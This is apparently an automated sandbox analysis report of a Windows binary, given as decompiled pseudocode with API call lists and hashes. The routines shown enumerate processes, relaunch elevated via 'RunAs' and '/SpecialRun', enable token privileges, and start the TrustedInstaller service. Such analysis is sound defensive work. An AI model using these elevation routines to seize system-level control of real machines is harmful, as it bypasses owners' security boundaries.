                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02D18C1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.980498446.0000000008A20000.00000040.00000001.sdmp, Offset: 08A20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.850141997.000000000107D000.00000040.00000001.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.856048934.0000000002D10000.00000040.00000001.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v24;
                                                                                                                				char _v32;
                                                                                                                				char _v40;
                                                                                                                				char _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				char _v576;
                                                                                                                				long _v580;
                                                                                                                				intOrPtr _v1112;
                                                                                                                				long _v1128;
                                                                                                                				void _v1132;
                                                                                                                				void* _v1136;
                                                                                                                				void _v1658;
                                                                                                                				char _v1660;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t41;
                                                                                                                				int _t46;
                                                                                                                				long _t49;
                                                                                                                				void* _t50;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				struct HINSTANCE__* _t68;
                                                                                                                				void* _t71;
                                                                                                                				void* _t83;
                                                                                                                				void* _t84;
                                                                                                                				void* _t85;
                                                                                                                
                                                                                                                				_t78 = _a4;
                                                                                                                				E004099D4(_a4 + 0x28);
                                                                                                                				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                				_v12 = _t41;
                                                                                                                				memset( &_v1132, 0, 0x228);
                                                                                                                				_t84 = _t83 + 0xc;
                                                                                                                				_v1136 = 0x22c;
                                                                                                                				Process32FirstW(_v12,  &_v1136); // executed
                                                                                                                				while(1) {
                                                                                                                					_t46 = Process32NextW(_v12,  &_v1136); // executed
                                                                                                                					if(_t46 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					E004090AF( &_v580);
                                                                                                                					_t49 = _v1128;
                                                                                                                					_v580 = _t49;
                                                                                                                					_v52 = _v1112;
                                                                                                                					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                                                					_v8 = _t50;
                                                                                                                					if(_t50 != 0) {
                                                                                                                						L4:
                                                                                                                						_v1660 = 0;
                                                                                                                						memset( &_v1658, 0, 0x208);
                                                                                                                						_t85 = _t84 + 0xc;
                                                                                                                						E004098F9(_t78, _v8,  &_v1660);
                                                                                                                						if(_v1660 != 0) {
                                                                                                                							L10:
                                                                                                                							E0040920A( &_v576,  &_v1660);
                                                                                                                							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                							_t84 = _t85 + 0x14;
                                                                                                                							CloseHandle(_v8);
                                                                                                                							_t78 = _a4;
                                                                                                                							L11:
                                                                                                                							E004099ED(_t78 + 0x28,  &_v580);
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_v16 = 0x104;
                                                                                                                						if( *0x41c8e0 == 0) {
                                                                                                                							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                							if(_t68 != 0) {
                                                                                                                								 *0x41c8e0 = 1;
                                                                                                                								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t66 =  *0x41c8e4;
                                                                                                                						if(_t66 != 0) {
                                                                                                                							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                                                					_v8 = _t71;
                                                                                                                					if(_t71 == 0) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				return CloseHandle(_v12);
                                                                                                                			}
































                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
                                                                                                                				struct _SHELLEXECUTEINFOW _v68;
                                                                                                                				void _v582;
                                                                                                                				char _v584;
                                                                                                                				void _v1110;
                                                                                                                				char _v1112;
                                                                                                                				long _t23;
                                                                                                                				int _t36;
                                                                                                                				int _t41;
                                                                                                                				void* _t43;
                                                                                                                				long _t44;
                                                                                                                
                                                                                                                				_t44 = 0;
                                                                                                                				_t23 = GetCurrentProcessId();
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				_v1112 = 0;
                                                                                                                				memset( &_v1110, 0, 0x208);
                                                                                                                				E00404AD9( &_v1112);
                                                                                                                				_push(_t23);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(L"/SpecialRun %I64x %d");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v584);
                                                                                                                				L0040B1EC();
                                                                                                                				memset( &(_v68.fMask), 0, 0x38);
                                                                                                                				_v68.lpFile =  &_v1112;
                                                                                                                				_v68.lpParameters =  &_v584;
                                                                                                                				_v68.cbSize = 0x3c;
                                                                                                                				_v68.lpVerb = L"RunAs";
                                                                                                                				_v68.fMask = 0x40;
                                                                                                                				_v68.nShow = 5;
                                                                                                                				_t36 = ShellExecuteExW( &_v68); // executed
                                                                                                                				_t43 = _v68.hProcess;
                                                                                                                				if(_t36 == 0) {
                                                                                                                					_t44 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WaitForSingleObject(_t43, 0x5dc);
                                                                                                                					_a4 = 0;
                                                                                                                					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
                                                                                                                					if(_t41 != 0 && _a4 != 0x103) {
                                                                                                                						_t44 = _a4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t44;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                				void* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t16;
                                                                                                                				_Unknown_base(*)()* _t18;
                                                                                                                				long _t19;
                                                                                                                				_Unknown_base(*)()* _t22;
                                                                                                                				_Unknown_base(*)()* _t24;
                                                                                                                				struct HINSTANCE__** _t35;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t37 = __eflags;
                                                                                                                				_t35 = __eax;
                                                                                                                				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                                					return GetLastError();
                                                                                                                				}
                                                                                                                				_t16 = E00408F72(_t35);
                                                                                                                				__eflags = _t16;
                                                                                                                				if(_t16 != 0) {
                                                                                                                					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                                					__eflags = _t24;
                                                                                                                					if(_t24 != 0) {
                                                                                                                						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_v24.PrivilegeCount = 1;
                                                                                                                				_v12 = 2;
                                                                                                                				_a4 = _v8;
                                                                                                                				_t18 = E00408F72(_t35);
                                                                                                                				__eflags = _t18;
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                                					__eflags = _t22;
                                                                                                                					if(_t22 != 0) {
                                                                                                                						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t19 = GetLastError();
                                                                                                                				FindCloseChangeNotification(_v8); // executed
                                                                                                                				return _t19;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                • API String ID: 616250965-1253513912
                                                                                                                • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
                                                                                                                				intOrPtr _v28;
                                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                                				void* _t5;
                                                                                                                				int _t12;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_t12 = 0; // executed
                                                                                                                				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                                				_t14 = _t5;
                                                                                                                				if(_t14 != 0) {
                                                                                                                					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                                                						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                                					}
                                                                                                                					CloseServiceHandle(_t14);
                                                                                                                				}
                                                                                                                				CloseServiceHandle(_a4);
                                                                                                                				return _t12;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                				struct HRSRC__* _t12;
                                                                                                                				void* _t16;
                                                                                                                				void* _t17;
                                                                                                                				signed int _t18;
                                                                                                                				signed int _t26;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t33;
                                                                                                                				struct HRSRC__* _t35;
                                                                                                                				signed int _t36;
                                                                                                                
                                                                                                                				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                				_t35 = _t12;
                                                                                                                				if(_t35 != 0) {
                                                                                                                					_t33 = SizeofResource(_a4, _t35);
                                                                                                                					if(_t33 > 0) {
                                                                                                                						_t16 = LoadResource(_a4, _t35);
                                                                                                                						if(_t16 != 0) {
                                                                                                                							_t17 = LockResource(_t16);
                                                                                                                							if(_t17 != 0) {
                                                                                                                								_a4 = _t33;
                                                                                                                								_t29 = _t33 * _t33;
                                                                                                                								_t36 = 0;
                                                                                                                								_t7 =  &_a4;
                                                                                                                								 *_t7 = _a4 >> 2;
                                                                                                                								if( *_t7 != 0) {
                                                                                                                									do {
                                                                                                                										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                										_t36 = _t36 + 1;
                                                                                                                										_t29 = _t26;
                                                                                                                									} while (_t36 < _a4);
                                                                                                                								}
                                                                                                                								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                                								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                                				WCHAR* _v8;
                                                                                                                				signed int _v12;
                                                                                                                				int _v16;
                                                                                                                				int _v20;
                                                                                                                				char* _v24;
                                                                                                                				int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				int _v36;
                                                                                                                				int _v40;
                                                                                                                				char _v44;
                                                                                                                				void* _v56;
                                                                                                                				int _v60;
                                                                                                                				char _v92;
                                                                                                                				void _v122;
                                                                                                                				int _v124;
                                                                                                                				short _v148;
                                                                                                                				signed int _v152;
                                                                                                                				intOrPtr _v168;
                                                                                                                				intOrPtr _v172;
                                                                                                                				intOrPtr _v176;
                                                                                                                				intOrPtr _v180;
                                                                                                                				void _v192;
                                                                                                                				char _v196;
                                                                                                                				char _v228;
                                                                                                                				void _v258;
                                                                                                                				int _v260;
                                                                                                                				void _v786;
                                                                                                                				short _v788;
                                                                                                                				void _v1314;
                                                                                                                				short _v1316;
                                                                                                                				void _v1842;
                                                                                                                				short _v1844;
                                                                                                                				void _v18234;
                                                                                                                				short _v18236;
                                                                                                                				char _v83772;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				short* _t174;
                                                                                                                				short _t175;
                                                                                                                				signed int _t176;
                                                                                                                				short _t177;
                                                                                                                				short _t178;
                                                                                                                				int _t184;
                                                                                                                				signed int _t187;
                                                                                                                				intOrPtr _t207;
                                                                                                                				intOrPtr _t219;
                                                                                                                				int* _t252;
                                                                                                                				int* _t253;
                                                                                                                				int* _t266;
                                                                                                                				int* _t267;
                                                                                                                				wchar_t* _t270;
                                                                                                                				int _t286;
                                                                                                                				void* _t292;
                                                                                                                				void* _t304;
                                                                                                                				WCHAR* _t308;
                                                                                                                				WCHAR* _t310;
                                                                                                                				intOrPtr* _t311;
                                                                                                                				int _t312;
                                                                                                                				WCHAR* _t315;
                                                                                                                				void* _t325;
                                                                                                                				void* _t328;
                                                                                                                
                                                                                                                				_t304 = __edx;
                                                                                                                				E0040B550(0x1473c, __ecx);
                                                                                                                				_t286 = 0;
                                                                                                                				 *_a4 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				memset( &_v192, 0, 0x40);
                                                                                                                				_v60 = 0;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v24 = 0;
                                                                                                                				_v40 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = 0x100;
                                                                                                                				_v44 = 0;
                                                                                                                				_v1316 = 0;
                                                                                                                				memset( &_v1314, 0, 0x208);
                                                                                                                				_v788 = 0;
                                                                                                                				memset( &_v786, 0, 0x208);
                                                                                                                				_t315 = _a8;
                                                                                                                				_t328 = _t325 + 0x24;
                                                                                                                				_v83772 = 0;
                                                                                                                				_v196 = 0x44;
                                                                                                                				E00404923(0x104,  &_v788, _t315);
                                                                                                                				if(wcschr(_t315, 0x25) != 0) {
                                                                                                                					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                                                				}
                                                                                                                				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                                                					_v8 = _t286;
                                                                                                                					_v1844 = _t286;
                                                                                                                					memset( &_v1842, _t286, 0x208);
                                                                                                                					_t328 = _t328 + 0xc;
                                                                                                                					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                                                					if(_v1844 != _t286) {
                                                                                                                						E00404923(0x104,  &_v788,  &_v1844);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t308 =  &(_t315[0x2106]);
                                                                                                                				if( *_t308 == _t286) {
                                                                                                                					E00404B5C( &_v1316,  &_v788);
                                                                                                                					__eflags = _v1316 - _t286;
                                                                                                                					_t315 = _a8;
                                                                                                                					_pop(_t292);
                                                                                                                					if(_v1316 == _t286) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				} else {
                                                                                                                					_v20 = _t308;
                                                                                                                					_t270 = wcschr(_t308, 0x25);
                                                                                                                					_pop(_t292);
                                                                                                                					if(_t270 == 0) {
                                                                                                                						L11:
                                                                                                                						_t174 =  &(_t315[0x220e]);
                                                                                                                						if( *_t174 != 1) {
                                                                                                                							_v152 = _v152 | 0x00000001;
                                                                                                                							_v148 =  *_t174;
                                                                                                                						}
                                                                                                                						_t309 = ",";
                                                                                                                						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                                                							_v260 = _t286;
                                                                                                                							memset( &_v258, _t286, 0x3e);
                                                                                                                							_v124 = _t286;
                                                                                                                							memset( &_v122, _t286, 0x3e);
                                                                                                                							_v8 = _t286;
                                                                                                                							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                                                							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                                                							_v152 = _v152 | 0x00000004;
                                                                                                                							_t266 =  &_v260;
                                                                                                                							_push(_t266);
                                                                                                                							L0040B1F8();
                                                                                                                							_v180 = _t266;
                                                                                                                							_t328 = _t328 + 0x3c;
                                                                                                                							_t267 =  &_v124;
                                                                                                                							L0040B1F8();
                                                                                                                							_t292 = _t267;
                                                                                                                							_v176 = _t267;
                                                                                                                						}
                                                                                                                						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                                                							_v260 = _t286;
                                                                                                                							memset( &_v258, _t286, 0x3e);
                                                                                                                							_v124 = _t286;
                                                                                                                							memset( &_v122, _t286, 0x3e);
                                                                                                                							_v8 = _t286;
                                                                                                                							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                                                							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                                                							_v152 = _v152 | 0x00000002;
                                                                                                                							_t252 =  &_v260;
                                                                                                                							_push(_t252);
                                                                                                                							L0040B1F8();
                                                                                                                							_v172 = _t252;
                                                                                                                							_t328 = _t328 + 0x3c;
                                                                                                                							_t253 =  &_v124;
                                                                                                                							_push(_t253);
                                                                                                                							L0040B1F8();
                                                                                                                							_v168 = _t253;
                                                                                                                						}
                                                                                                                						_t310 =  &(_t315[0x105]);
                                                                                                                						if( *_t310 != _t286) {
                                                                                                                							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                                                								_push(_t310);
                                                                                                                							} else {
                                                                                                                								_v18236 = _t286;
                                                                                                                								memset( &_v18234, _t286, 0x4000);
                                                                                                                								_t328 = _t328 + 0xc;
                                                                                                                								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                                                								_push( &_v18236);
                                                                                                                							}
                                                                                                                							_push( &_v788);
                                                                                                                							_push(L"\"%s\" %s");
                                                                                                                							_push(0x7fff);
                                                                                                                							_push( &_v83772);
                                                                                                                							L0040B1EC();
                                                                                                                							_v24 =  &_v83772;
                                                                                                                						}
                                                                                                                						_t175 = _t315[0x220c];
                                                                                                                						if(_t175 != 0x20) {
                                                                                                                							_v12 = _t175;
                                                                                                                						}
                                                                                                                						_t311 = _a4;
                                                                                                                						if(_t315[0x2254] == 2) {
                                                                                                                							E00401D1E(_t311, L"RunAsInvoker");
                                                                                                                						}
                                                                                                                						_t176 = _t315[0x265c];
                                                                                                                						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                                                							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                                                						}
